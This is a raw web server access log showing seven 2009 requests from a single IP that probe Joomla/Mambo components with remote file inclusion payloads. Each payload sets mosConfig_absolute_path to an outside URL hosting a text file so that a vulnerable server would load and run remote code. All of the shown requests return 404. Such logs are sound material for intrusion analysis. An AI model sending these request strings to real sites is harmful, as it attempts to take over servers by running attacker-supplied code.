72.11.145.8 - - [26/Nov/2009:05:14:47 -0500] "GET /logs/error_log.Q109110100//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:14:59 -0500] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:14:59 -0500] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:15:04 -0500] "GET /logs/access_log.Q109081600//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:15:12 -0500] "GET /logs/access_log.Q109051700//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:15:36 -0500] "GET /logs/error_log.Q109081000//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:15:41 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
